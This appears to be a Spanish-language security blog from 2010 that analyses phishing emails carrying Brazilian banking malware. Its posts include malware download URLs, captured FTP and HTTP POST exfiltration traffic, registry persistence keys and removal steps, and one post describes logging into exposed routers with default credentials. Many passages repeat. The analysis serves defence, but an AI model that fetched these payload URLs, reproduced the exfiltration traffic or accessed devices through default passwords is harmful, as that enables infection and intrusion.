Conectando a lajeado2010.tv|189.38.80.195|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 116992 (114K) [image/png]
Guardando a: «itens_img01.png.1»
100%[======================================>] 116.992 37,0K/s en 3,1s
2010-08-23 21:18:01 (37,0 KB/s) - «itens_img01.png.1» guardado [116992/116992]
juan@moon:~$ file itens_img01.png
itens_img01.png: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
juan@moon:~$
Ya no cabe duda de que no se trata de un png xD, sino de un archivo ejecutable de windows. Aca el análisis de virustotal de itens_img01.png http://www.virustotal.com/file-scan/report.html?id=f911b9f4a1801f480151d75466da7806d1efb2e842fffecff625aec1ab4fea10-1282609386.
miércoles, 4 de agosto de 2010
Todo sigue igual...
Esta semana comencé la facultad de nuevo y junto con eso una pasantía en el centro de redes de otra universidad, todo esto implica una drástica disminución en mis tiempos libres xD.
Hoy después de varios días volví a recibir un mail de mi "contacto", pero el punto esta vez es que... el mail tiene el mismo asunto que el de la entrada del 15 de julio (http://viviendolared.blogspot.com/2010/07/otro-mail-interesante-encontrado-o.html) y pienso... mierda!!! ni siquiera se molestan en innovar!!! El archivo se sigue llamando igual, aunque esta vez se encuentra alojado en http://bit.ly/ afgHin?0.05796 -> http://svelin.com/stats/fotos.com .
Lo mas gracioso de este caso... es que el sitio en cuestión (svelin.com) corre el servicio Webalizer:
Ven el punto roojo? xD, bueno, analicemos... a los 4 días del mes de agosto se superaron ampliamente las métricas diarias respecto al resto de los meses, inclusive se superaron algunas métricas mensuales!!! En los 4 días que van de agosto hubo el doble de visitas que en todo julio jajjaja, definitivamente como administrador del sitio esto me llamaría poderosamente la atención. Los administradores ya fueron debidamente avisados.
Mirando un poco mas podemos hasta deducir la fecha en que se pudo haber perpetrado la intrusión:
Vemos que el día 3, las métricas revientan respecto a los otros dos días de agosto... claramente eso es un indicio de que comenzó a propagarse el enlace al malware que tienen hospedado...
Otro, mirá quien está en segundo puesto de las url mas accedidas :P
Esta siguiente me pareció MUY interesante, la mayoría de los referrers (páginas desde donde se accedió al enlace del malware) son webmails!!!
Al menos sospechoso deberia ser, que un sitio aparentemente Checo tenga un gráfico así:
Tendrían que hacer una versión en portugues? NO!!!!! tienen que borrar el fotos.com!!! y denunciar una intrusión a principios de agosto seguramente, posiblemente el 3 cerca del medio día!!!
Una vez mas queda claro el objetivo de este malware... BRASIL!!! el país sudamericano con mayores usuarios de internet y homebanking.
Esta vez no voy a hacer mas análisis de fotos.com, ya que se comporta de la misma manera que los anteriores, inclusive sigue utilizando a www.avinnovo.com y otros hosts que ya fueron advertidos de que se encuentran hospedando malware.
La pregunta es... ¿¿¿complicidad o ignorancia??? la respuesta es...
Actualización... navegando un poco mas el sitio en cuestión se puede encontrar una PHPshell... no voy a poner el enlace por una cuestión obvia, pero evidentemente el sitio está MUY comprometido.
Hoy después de varios días volví a recibir un mail de mi "contacto", pero el punto esta vez es que... el mail tiene el mismo asunto que el de la entrada del 15 de julio (http://viviendolared.blogspot.com/2010/07/otro-mail-interesante-encontrado-o.html) y pienso... mierda!!! ni siquiera se molestan en innovar!!! El archivo se sigue llamando igual, aunque esta vez se encuentra alojado en http://bit.ly/ afgHin?0.05796 -> http://svelin.com/stats/fotos.com .
Lo mas gracioso de este caso... es que el sitio en cuestión (svelin.com) corre el servicio Webalizer:
Ven el punto roojo? xD, bueno, analicemos... a los 4 días del mes de agosto se superaron ampliamente las métricas diarias respecto al resto de los meses, inclusive se superaron algunas métricas mensuales!!! En los 4 días que van de agosto hubo el doble de visitas que en todo julio jajjaja, definitivamente como administrador del sitio esto me llamaría poderosamente la atención. Los administradores ya fueron debidamente avisados.
Mirando un poco mas podemos hasta deducir la fecha en que se pudo haber perpetrado la intrusión:
Vemos que el día 3, las métricas revientan respecto a los otros dos días de agosto... claramente eso es un indicio de que comenzó a propagarse el enlace al malware que tienen hospedado...
Otro, mirá quien está en segundo puesto de las url mas accedidas :P
Esta siguiente me pareció MUY interesante, la mayoría de los referrers (páginas desde donde se accedió al enlace del malware) son webmails!!!
Al menos sospechoso deberia ser, que un sitio aparentemente Checo tenga un gráfico así:
Tendrían que hacer una versión en portugues? NO!!!!! tienen que borrar el fotos.com!!! y denunciar una intrusión a principios de agosto seguramente, posiblemente el 3 cerca del medio día!!!
Una vez mas queda claro el objetivo de este malware... BRASIL!!! el país sudamericano con mayores usuarios de internet y homebanking.
Esta vez no voy a hacer mas análisis de fotos.com, ya que se comporta de la misma manera que los anteriores, inclusive sigue utilizando a www.avinnovo.com y otros hosts que ya fueron advertidos de que se encuentran hospedando malware.
La pregunta es... ¿¿¿complicidad o ignorancia??? la respuesta es...
Actualización... navegando un poco mas el sitio en cuestión se puede encontrar una PHPshell... no voy a poner el enlace por una cuestión obvia, pero evidentemente el sitio está MUY comprometido.
jueves, 29 de julio de 2010
El eterno dilema de las configuraciones por defecto...
Las configuraciones por defecto/default son aquellas que se obtienen por el simple hecho de instalar o poner en funcionamiento un determinado producto. Es decir, es la configuración que el fabricante da a su producto antes de ponerlo en el mercado y por lo tanto la configuración inicial con la que se encuentra el cliente al utilizarlo. Esta medida adoptada por los fabricantes facilita, entre otras cosas, la documentación y presentación de sus productos.
Ahora... el problema radica en que estas configuraciones deberían ser reemplazadas por configuraciones específicas/personalizadas definidas por el usuario/cliente antes de que el producto sea puesto en funcionamiento.
¿Por qué cambiarlas si anda bien así? mmm una buena pregunta, es tan lindo cuando todo funciona perfectamente (o al menos eso parece) que nadie quiere tocarlo. Pero... las configuraciones por defecto se encuentran en la documentación del producto... y la documentación del producto se puede encontrar en internet... entonces nuestra configuración se encuentra a disposición de todo ser vivo capaz de escribir www.google.com en su browser favorito.
Hay cientos de sitios en internet (al alcance de www.google.com...) que se encargan, por ejemplo, de listar los user/password por defecto de aplicaciones y productos.
Hoy mientras probaba mi suscripción a http://www.shodanhq.com (un buscador... diferente) me encontré con una serie de dispositivos con contraseñas por defecto.
Lo que realmente me llamó la atención fue ver esto:
Y así es como los incidentes pasan...
En los 3 casos se accede como administrador a la configuración del router, desde donde podemos:
Moraleja... como dicen por ahí RFM (read the fucking manual) y no dejen las configuraciones por defecto :P.
Ahora... el problema radica en que estas configuraciones deberían ser reemplazadas por configuraciones específicas/personalizadas definidas por el usuario/cliente antes de que el producto sea puesto en funcionamiento.
¿Por qué cambiarlas si anda bien así? mmm una buena pregunta, es tan lindo cuando todo funciona perfectamente (o al menos eso parece) que nadie quiere tocarlo. Pero... las configuraciones por defecto se encuentran en la documentación del producto... y la documentación del producto se puede encontrar en internet... entonces nuestra configuración se encuentra a disposición de todo ser vivo capaz de escribir www.google.com en su browser favorito.
Hay cientos de sitios en internet (al alcance de www.google.com...) que se encargan, por ejemplo, de listar los user/password por defecto de aplicaciones y productos.
Hoy mientras probaba mi suscripción a http://www.shodanhq.com (un buscador... diferente) me encontré con una serie de dispositivos con contraseñas por defecto.
Lo que realmente me llamó la atención fue ver esto:
Correspondiente a algún lugar de Canada según MaxMind GeoIP
Israel
Israel
Los 3 hosts cuentan con routers de la misma marca (Edimax) y los 3 mantienen la configuración por defecto, pero lo gracioso está en cómo el fabricante:
- Permite acceso http desde internet al router.
- Presenta la tupla usuario/password por defecto de una forma tan explícita que realmente causa gracia admin/1234.
Y así es como los incidentes pasan...
En los 3 casos se accede como administrador a la configuración del router, desde donde podemos:
- Ver las direcciones IP privadas asignadas (en uso en este momento).
- Configuración del firewall, en uno de ellos se encuentra desactivado.
- La información del cliente y el servicio de internet.
- Se pueden ver/eliminar los logs.
- Y un largo etc, que incluye todo lo que sea posible hacer en cuanto a modificación de la configuración del router xD, yendo desde cambios en la configuración wireless,LAN,WAN hasta cambiarle el firmware jajaja.
Moraleja... como dicen por ahí RFM (read the fucking manual) y no dejen las configuraciones por defecto :P.
viernes, 23 de julio de 2010
Otro: "Esse seu orkut e um fake? ou vc nem sabia que existia?"
Aca está la muestra de hoy, de nuevo Visualizar.com, esta vez queriendo engañar con un falso link a orkut (la mayor red social brasilera, si no me equivoco, y de google) http://www.orkut.com.br/Main#Profile?uid=7282100705742116-0.13350, que en realidad nos envía a http://ow.ly/2foDE?orkut.com.br/Main#Profile?uid=7282100705742116?0.13350 (si, otra vez ocultado la dirección tras ow.ly) desde donde descargamos otro Visualizar.com, hospedado en un servidor ruso verimgsua.h1.ru/visualizar.php .
Esta vez hay un condimento extra a la usual descarga de imágenes y ejecutables que le siguen a la ejecución de visualizar.com y es una conexión a un servidor FTP. Los datos esta vez son subidos al servidor ftp de la siguiente manera:
220 ftp.xpg.com.br.
USER albumpng
331 Password required for albumpng
PASS
230 User albumpng logged in
TYPE I
200 Type set to I
SYST
215 UNIX Type: L8
PORT 192,168,206,153,19,137
200 PORT command successful.
LIST
150 Opening BINARY mode data connection for file list
226 Transfer complete
CWD lista
250 CWD command successful
PORT 192,168,206,153,19,138
200 PORT command successful.
STOR JUAN-AA57CF7254 [22:07:04] .txt
150 Opening BINARY mode data connection for JUAN-AA57CF7254 [22:07:04] .txt
226 Transfer complete
XPG resulta ser una empresa que brinda servicio de hosting gratuito... www.xpg.com.br.
Eliminé el password por razones obvias... pero dentro del ftp existe un directorio llamado lista donde al momento de escribir esta entrada hay mas de 300 archivos de equipos infectados. Cada archivo además de la información del equipo, recolecta e-mails de los usuarios del equipo, muchos.. muchos correos electrónicos para spam definitivamente.
Admito que mi portugues es muy malo, no logré encontrar en el sitio oficial de xpg un mail de contacto para avisarles de la situación, entonces...
Espero que los chicos tengan backup... sino se van a enojar mucho conmigo...
El reporte del día de hoy, corto pero conciso...
Aprovecho para agregar algo nuevo, esta vez durante toda la prueba utlicé un software de monitoreo que se llama CaptureBAT, si bien es un tanto "poco amigable" ofrece buen información:
Aca las dos claves del registro que hay que eliminar para que no se inicien los procesos maliciosos al arrancar la PC. A decir verdad, las claves de registro modificadas por Visualizar.com son demasiadas... a tal punto que el archivo de log pesa unos 1300Kb (de puro texto plano...)
juan@moon:~/Escritorio/test23julio/carpeta sin título$ cat salida_limpia.txt | grep Run
registry: SetValueKey C:\Arquivo de programas\mss.exe -> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msgrmsn
registry: SetValueKey C:\Arquivo de programas\satplg.exe -> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Aca vemos como a medida que se completa la descarga de los ejecutables comienzan a lanzarse los nuevos procesos entre ellos.
juan@moon:~/Escritorio/test23julio/carpeta sin título$ cat salida_limpia.txt | grep "process: created"
process: created C:\WINDOWS\explorer.exe -> C:\Documents and Settings\Administrador\Escritorio\Visualizar.com
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\wink.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\mstim.exe
process: created C:\Arquivo de programas\mstim.exe -> C:\WINDOWS\system32\dwwin.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\noix.exe
process: created C:\Arquivo de programas\noix.exe -> C:\WINDOWS\system32\net.exe
process: created C:\WINDOWS\system32\net.exe -> C:\WINDOWS\system32\net1.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\mss.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\satplg.exe
Esta vez hay un condimento extra a la usual descarga de imágenes y ejecutables que le siguen a la ejecución de visualizar.com y es una conexión a un servidor FTP. Los datos esta vez son subidos al servidor ftp de la siguiente manera:
220 ftp.xpg.com.br.
USER albumpng
331 Password required for albumpng
PASS
230 User albumpng logged in
TYPE I
200 Type set to I
SYST
215 UNIX Type: L8
PORT 192,168,206,153,19,137
200 PORT command successful.
LIST
150 Opening BINARY mode data connection for file list
226 Transfer complete
CWD lista
250 CWD command successful
PORT 192,168,206,153,19,138
200 PORT command successful.
STOR JUAN-AA57CF7254 [22:07:04] .txt
150 Opening BINARY mode data connection for JUAN-AA57CF7254 [22:07:04] .txt
226 Transfer complete
XPG resulta ser una empresa que brinda servicio de hosting gratuito... www.xpg.com.br.
Eliminé el password por razones obvias... pero dentro del ftp existe un directorio llamado lista donde al momento de escribir esta entrada hay mas de 300 archivos de equipos infectados. Cada archivo además de la información del equipo, recolecta e-mails de los usuarios del equipo, muchos.. muchos correos electrónicos para spam definitivamente.
Admito que mi portugues es muy malo, no logré encontrar en el sitio oficial de xpg un mail de contacto para avisarles de la situación, entonces...
Espero que los chicos tengan backup... sino se van a enojar mucho conmigo...
El reporte del día de hoy, corto pero conciso...
Aprovecho para agregar algo nuevo, esta vez durante toda la prueba utlicé un software de monitoreo que se llama CaptureBAT, si bien es un tanto "poco amigable" ofrece buen información:
Aca las dos claves del registro que hay que eliminar para que no se inicien los procesos maliciosos al arrancar la PC. A decir verdad, las claves de registro modificadas por Visualizar.com son demasiadas... a tal punto que el archivo de log pesa unos 1300Kb (de puro texto plano...)
juan@moon:~/Escritorio/test23julio/carpeta sin título$ cat salida_limpia.txt | grep Run
registry: SetValueKey C:\Arquivo de programas\mss.exe -> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msgrmsn
registry: SetValueKey C:\Arquivo de programas\satplg.exe -> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Aca vemos como a medida que se completa la descarga de los ejecutables comienzan a lanzarse los nuevos procesos entre ellos.
juan@moon:~/Escritorio/test23julio/carpeta sin título$ cat salida_limpia.txt | grep "process: created"
process: created C:\WINDOWS\explorer.exe -> C:\Documents and Settings\Administrador\Escritorio\Visualizar.com
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\wink.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\mstim.exe
process: created C:\Arquivo de programas\mstim.exe -> C:\WINDOWS\system32\dwwin.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\noix.exe
process: created C:\Arquivo de programas\noix.exe -> C:\WINDOWS\system32\net.exe
process: created C:\WINDOWS\system32\net.exe -> C:\WINDOWS\system32\net1.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\mss.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\satplg.exe
lunes, 19 de julio de 2010
Se mantiene el MO: "Video porno caseiro de bruno e Eliza Samudio..Download!"
Descargando un poco la tensión de los exámenes... acabo a revisar mi mail para ver si me encontraba con algo interesante. Para "mi sorpresa", mi contacto preferida (la que me inspiró las ultimas 3 entradas) me envió un mail. Esta vez se trata de un supuesto video en:
http://blogspot.com/video/Eliza_Samudio002.avi-0.41616
que en realidad es un link a
http://loopstkerh.h1.ru/visualizar.ph p?0.41616 (el espacio está incluido para romper el link)
Desde allí nos descarga un archivo "Visualizar.com", sisi, nombre similar a uno de los archivos de las entradas anteriores. Análisis de virustotal.com: http://www.virustotal.com/es/analisis/05dd1784fd3971e92a40a906bec457bb347e437cc380dcc48f713eeaba053804-1279559435
Probando nuestro nuevo archivo en un entorno aislado observamos:
1-Descarga del sitio: http://www.verstkerh.h1.ru/
2-Una vez descargado comienza a hacer cosas interesante. Se conecta a una base de datos, aparentemente un sqlserver y nos presenta un login de messenger para meter nuestros datos (curiosamente en portugues...):
Jamás utilicé SqlServer, pero claramente se tata de uno. Una vez establecida la conexión con el servidor de base de datos hace muchas consultas UPDATES subiendo mi información de infección y luego descarga una módica suma de mas de 1300 direcciones de email con sus respectivas contraseñas... a partir de ahora se conecta a los servidores de hotmail e intenta enviar correos.
3-Ahora se me ocurrió probar qué hace realmente esta pantalla de menssenger, que no es mas que una imagen con dos campos para ingresar. Ingresé el siguiente mail: "alhoja@nada.com" y contraseña "asdasdasd", veamos:
Lo anterior es un fragmento de la conexión que se establece con el servidor de base de datos cuando ingresamos nuestro mail y contraseña. Se puede ver como se realiza un insert de nuestros datoss de la forma "INSERT INTO msnlst (contactos) VALUES (''alhoja@nada.com,asdasdasd");" que es exáctamente el formato en el que se descargó la lista de mails anteriormente. Luego de esto, la venta fraudulenta nos avisa que pusimos mal la contraseña y lanza ahora si, el proceso original msn messenger para que no surjan sospechas.
Un proceso que queda corriendo es mstimer, que intenta obtener un login positivo para poder enviar mails desde la cuenta robada.
Es MUCHA la cantidad de archivos descargados en los directorios de temporales. Algunos archivos son las keys para la conexión con las bases de datos (autofirmadas, claramente), muchas imágenes, cookies, etc. En el disco C se depositan los siguientes archivos:
En arquivo de programas
msg.txt contiene el mensajes que se envía por email, en este caso se trata de una foto con un link a la descarga de Visualizar.com.
mstimer.exe y csrrs.exe son los encargados de hacer el trabajo sucio
csrrs.exe es quien se conecta con la base de datos para enviar y descargar correos e información.
mstimer.exe es el que realiza la autenticación contra hotmail para enviar los correos.
El método de subsistencia parece ser dos entradas al registro, una para cada uno de los dos ejecutables anteriores.
[HKEY_USERS\S-1-5-21-527237240-1958367476-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Run]
"Winnet"="C:\\Arquivo de programas\\csrrs.exe"
"Msnnet"="C:\\Arquivo de programas\\mstimer.exe"
COMPLETAMENTE recomendable eliminarlas, junto con TODO el directorio "Arquivo de programas", notese... "arQUIVO de programas", siempre se trata de malware diseñado manteniendo como objetivo primario a brasil. También es recomendable elimiar TODO el contenido temporal del browser y pasar el antivirus (si, el que actualizas todos los días :P).
Voy a intentar... si el tiempo y la cabeza me lo permiten investigar un poco mas sobre los archivos descargados.
http://blogspot.com/video/Eliza_Samudio002.avi-0.41616
que en realidad es un link a
http://loopstkerh.h1.ru/visualizar.ph p?0.41616 (el espacio está incluido para romper el link)
Desde allí nos descarga un archivo "Visualizar.com", sisi, nombre similar a uno de los archivos de las entradas anteriores. Análisis de virustotal.com: http://www.virustotal.com/es/analisis/05dd1784fd3971e92a40a906bec457bb347e437cc380dcc48f713eeaba053804-1279559435
Probando nuestro nuevo archivo en un entorno aislado observamos:
1-Descarga del sitio: http://www.verstkerh.h1.ru/
2-Una vez descargado comienza a hacer cosas interesante. Se conecta a una base de datos, aparentemente un sqlserver y nos presenta un login de messenger para meter nuestros datos (curiosamente en portugues...):
Jamás utilicé SqlServer, pero claramente se tata de uno. Una vez establecida la conexión con el servidor de base de datos hace muchas consultas UPDATES subiendo mi información de infección y luego descarga una módica suma de mas de 1300 direcciones de email con sus respectivas contraseñas... a partir de ahora se conecta a los servidores de hotmail e intenta enviar correos.
3-Ahora se me ocurrió probar qué hace realmente esta pantalla de menssenger, que no es mas que una imagen con dos campos para ingresar. Ingresé el siguiente mail: "alhoja@nada.com" y contraseña "asdasdasd", veamos:
Lo anterior es un fragmento de la conexión que se establece con el servidor de base de datos cuando ingresamos nuestro mail y contraseña. Se puede ver como se realiza un insert de nuestros datoss de la forma "INSERT INTO msnlst (contactos) VALUES (''alhoja@nada.com,asdasdasd");" que es exáctamente el formato en el que se descargó la lista de mails anteriormente. Luego de esto, la venta fraudulenta nos avisa que pusimos mal la contraseña y lanza ahora si, el proceso original msn messenger para que no surjan sospechas.
Un proceso que queda corriendo es mstimer, que intenta obtener un login positivo para poder enviar mails desde la cuenta robada.
Es MUCHA la cantidad de archivos descargados en los directorios de temporales. Algunos archivos son las keys para la conexión con las bases de datos (autofirmadas, claramente), muchas imágenes, cookies, etc. En el disco C se depositan los siguientes archivos:
En arquivo de programas
msg.txt contiene el mensajes que se envía por email, en este caso se trata de una foto con un link a la descarga de Visualizar.com.
mstimer.exe y csrrs.exe son los encargados de hacer el trabajo sucio
csrrs.exe es quien se conecta con la base de datos para enviar y descargar correos e información.
mstimer.exe es el que realiza la autenticación contra hotmail para enviar los correos.
El método de subsistencia parece ser dos entradas al registro, una para cada uno de los dos ejecutables anteriores.
[HKEY_USERS\S-1-5-21-527237240-1958367476-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Run]
"Winnet"="C:\\Arquivo de programas\\csrrs.exe"
"Msnnet"="C:\\Arquivo de programas\\mstimer.exe"
COMPLETAMENTE recomendable eliminarlas, junto con TODO el directorio "Arquivo de programas", notese... "arQUIVO de programas", siempre se trata de malware diseñado manteniendo como objetivo primario a brasil. También es recomendable elimiar TODO el contenido temporal del browser y pasar el antivirus (si, el que actualizas todos los días :P).
Voy a intentar... si el tiempo y la cabeza me lo permiten investigar un poco mas sobre los archivos descargados.
domingo, 18 de julio de 2010
Otro caso interesante: "O vídeo mais acessado do youtube, mais de 56 milhões de acessos. muito bom esse vídeo!!!!!"
En fin... esto se está haciendo vicio ya. Con pocas ganas de estudiar para los finales, aca estoy, de nuevo escribiendo sobre un mail fraudulento. Una vez mas el medio es, un supuesto video de youtube, lo gracioso es que es del mismo mail que los dos anteriores xD. El título indica el texto del mail, que viene junto con una imagen que aparenta ser un video, pero no es mas que un link al sitio: "http://premiumassessoria.com.br/css/index.p hp" que nos invita a descargar un archivo (ver.exe, sisi... .exe) de un sitio ruso....
Si por una de esas cuestiones de la vida ejecutamos este archivo (en las máquinas virtuales no uso antivirus, porque son justamente para hacer estas cosas feas) y el SIEMPRE actualizado antivirus no nos detiene, nos encontraremos bajando (de vidaboa2009.pochta.ru, que por momentos parece estar inhabilitado) un archivo llamado Vver.exe. La resolución dns del nombre nos indica que es un CNAME, y que realmente apunto a ftp.pochta.ru (un ftp si acceso anónimo xD), así y todo el archivo se descarga por http.
Acá se pone interesante, luego de descargar el archivo e infectar el sistema, pide una resolución dns para smtp.terra.com.br (un servidor de correo, seguramente de terra brasil). Con la dirección obtenida se intenta una conexión smtp (seguramente para utilizar el servidor de correo como servidor para enviar spam), pero sin éxito, posiblemente la gente de terra ya se puso manos a la obra.
El siguiente dominio a consultar es www.arqueiroverde.net, y se envía por POST la siguiente info a http://www.arqueiroverde.net/enviador.php
praquem=xurupita02@gmail.com&titulo=.::.INFECT.::.&texto=:::=-=-=-=-=-=-=-=-=-=-=-=-=-=-::: ::Usuario:: ::Monitor:: 1280 X 800 ::HD Fisico::::0485F93D ::Mac Adress:::00-0C-29-D5-C0-72 ::Data:: 17/07/2010 ::Hora::: 23:47:18 =-=-=-=--=-=-=-=-=-=-==-=-=-=-==-= &
Otro mail para nuestra lista de buenos amigos xD.
Arqueiroverde.net... lista el contenido del directorio raiz del sitio, algo muy raro, se pueden ver dos directorios, y el archivo enviador.php.
Por ultimo, el proceso que queda en ejecución en background (spoolvv) establece una comunicación http con el host "http://sbr9.hostdime.com.b r", pero no pude ver tráfico, posiblemente ya esté deshabilitado.
mmmm, para removerlo...
Primero que nada limpiar el contenido temporal del browser, cookies, etc. Luego eliminar los archivos que se crearon en C:\Windows\System32 (en caso de XP):
Y por último quitar la clave de autoarranque del registro:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Windows\\System32\\win_update.exe"
Al parecer para este llegué un poco tarde, ya que está bastante restringida su operación, al menos al parecer. Espero que aparezca uno mas interesante en estos días.
Tendría que ir pensando en escribir algo distinto, pero bue... por ahora la facultad no me permite otra cosa.
Si por una de esas cuestiones de la vida ejecutamos este archivo (en las máquinas virtuales no uso antivirus, porque son justamente para hacer estas cosas feas) y el SIEMPRE actualizado antivirus no nos detiene, nos encontraremos bajando (de vidaboa2009.pochta.ru, que por momentos parece estar inhabilitado) un archivo llamado Vver.exe. La resolución dns del nombre nos indica que es un CNAME, y que realmente apunto a ftp.pochta.ru (un ftp si acceso anónimo xD), así y todo el archivo se descarga por http.
Acá se pone interesante, luego de descargar el archivo e infectar el sistema, pide una resolución dns para smtp.terra.com.br (un servidor de correo, seguramente de terra brasil). Con la dirección obtenida se intenta una conexión smtp (seguramente para utilizar el servidor de correo como servidor para enviar spam), pero sin éxito, posiblemente la gente de terra ya se puso manos a la obra.
El siguiente dominio a consultar es www.arqueiroverde.net, y se envía por POST la siguiente info a http://www.arqueiroverde.net/enviador.php
praquem=xurupita02@gmail.com&titulo=.::.INFECT.::.&texto=:::=-=-=-=-=-=-=-=-=-=-=-=-=-=-::: ::Usuario:: ::Monitor:: 1280 X 800 ::HD Fisico::::0485F93D ::Mac Adress:::00-0C-29-D5-C0-72 ::Data:: 17/07/2010 ::Hora::: 23:47:18 =-=-=-=--=-=-=-=-=-=-==-=-=-=-==-= &
Otro mail para nuestra lista de buenos amigos xD.
Arqueiroverde.net... lista el contenido del directorio raiz del sitio, algo muy raro, se pueden ver dos directorios, y el archivo enviador.php.
Por ultimo, el proceso que queda en ejecución en background (spoolvv) establece una comunicación http con el host "http://sbr9.hostdime.com.b r", pero no pude ver tráfico, posiblemente ya esté deshabilitado.
mmmm, para removerlo...
Primero que nada limpiar el contenido temporal del browser, cookies, etc. Luego eliminar los archivos que se crearon en C:\Windows\System32 (en caso de XP):
Y por último quitar la clave de autoarranque del registro:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Windows\\System32\\win_update.exe"
Al parecer para este llegué un poco tarde, ya que está bastante restringida su operación, al menos al parecer. Espero que aparezca uno mas interesante en estos días.
Tendría que ir pensando en escribir algo distinto, pero bue... por ahora la facultad no me permite otra cosa.
jueves, 15 de julio de 2010
Otro mail interesante "Encontrado o Corpo da ex-amante do Goleiro Bruno do Flamento."
Como tengo muuuuuchos contactos que me quieren y se preocupan por mi falta de interacción con la sociedad, recibo varios mails al día, de los cuales la mayoria son cadenas/spam/phishing, y solamente leo los últimos xD.
Hoy me encontré con uno que me invita a ver un video de youtube sobre el cuerpo de alguna ex-amante de "Bruno do Flamento", que al parecer se trata de un caso de homicidio donde se investiga a un jugador del club Flamengo llamado Bruno. Los brasileros tienen un interesante índice de casos de phising xD.
El link a youtube es: http://www.youtube.com/watch?v=SroGd-1ahG0&feature=related-0.48874 realmente es el link a un video que no está disponible (seguramente porque NUNCA existió tal video), pero a decir verdad cuando uno hace click sobre el supuesto link, este no es mas que texto con un enlace a la dirección "http://bit.ly/byg70N?0.48874", sisi, uno de esos enlaces anonimizados xD. El link nos "invita" a descargar un archivo llamado "fotos.com" de http://www.oabpr.com.br/imagens/noticia/g/fotos. com, sisi.... ni se esfuerzan para ocultar la extensión xD.
Un sitio un tanto... extraño diría... diseñado por los chicos de Webk2 (cuyo sitio está terriblemente bloqueado por los navegadores...). El sitio oabpr.com.br adolece de MUCHAS vulnerabilidades a SIMPLE vista, y es el lugar ideal para cultivar porquerias, como están haciendo los chicos de "Hacked by Vrs-hCk - c0li.m0de.0n.".
Hoy me encontré con uno que me invita a ver un video de youtube sobre el cuerpo de alguna ex-amante de "Bruno do Flamento", que al parecer se trata de un caso de homicidio donde se investiga a un jugador del club Flamengo llamado Bruno. Los brasileros tienen un interesante índice de casos de phising xD.
El link a youtube es: http://www.youtube.com/watch?v=SroGd-1ahG0&feature=related-0.48874 realmente es el link a un video que no está disponible (seguramente porque NUNCA existió tal video), pero a decir verdad cuando uno hace click sobre el supuesto link, este no es mas que texto con un enlace a la dirección "http://bit.ly/byg70N?0.48874", sisi, uno de esos enlaces anonimizados xD. El link nos "invita" a descargar un archivo llamado "fotos.com" de http://www.oabpr.com.br/imagens/noticia/g/fotos. com, sisi.... ni se esfuerzan para ocultar la extensión xD.
Un sitio un tanto... extraño diría... diseñado por los chicos de Webk2 (cuyo sitio está terriblemente bloqueado por los navegadores...). El sitio oabpr.com.br adolece de MUCHAS vulnerabilidades a SIMPLE vista, y es el lugar ideal para cultivar porquerias, como están haciendo los chicos de "Hacked by Vrs-hCk - c0li.m0de.0n.".
El sitio está... increiblemente comprometido, al punto que da a pensar que fue creado con esa idea, si bien parece tener contenido relacionado (es un sitio de los abogados de brazil, que loco, no?). Entre las cosas que hay: un shell en php que permite hacer prácticamente cualquier cosa desde el servidor, scripts para enviar spam..., varios archivos .exe y .com para descargar e infectarse..., etc, y un aparente gestor de logs xD. MUY MUY comprometido...
En fin..., ahora un poco del funcionamiento de nuestro fotos.com:
1-Lo primero que aparentemente hace es descargarse un archivo llamado sidebar.exe (algun tipo de barra para IE posiblemente) de otro posible sitio comprometido: www.avinnovo.com/modules/mod_archive/tmpl/sidebr. exe.
2-Luego comienza a descargar imágenes,alguno que otro .sys/.exe/.pri/.ico, muchas de hecho, del sitio sambananas.dk/pics/train/ (dk resulta ser el TLD correspondiente a Dinamarca...). Gracioso que todas las imágenes que descarga hacen referencia a entidades bancarias... e íconos de navegadores web como IE y FF.
3-Una vez que descarga todas sus cosas y las acomoda en "Arquivos de progrmas" y directorios locales del usuario, ahora, haciendo uso de http://meuip.datahouse.com.br/, el bichito captura la ip publica del infectado :D. Y aca viene algo divertido, luego de capturar mi IP, se conecta sin resolución de nombres a una dirección específica (aparentemente otro sitio brasilero comprometido, que mas bien parece un fake porque no tiene un nombre de dominio propio...) a la cual envía los siguientes datos (POST /ajax/indx.php HTTP/1.0):
URLENCODED:
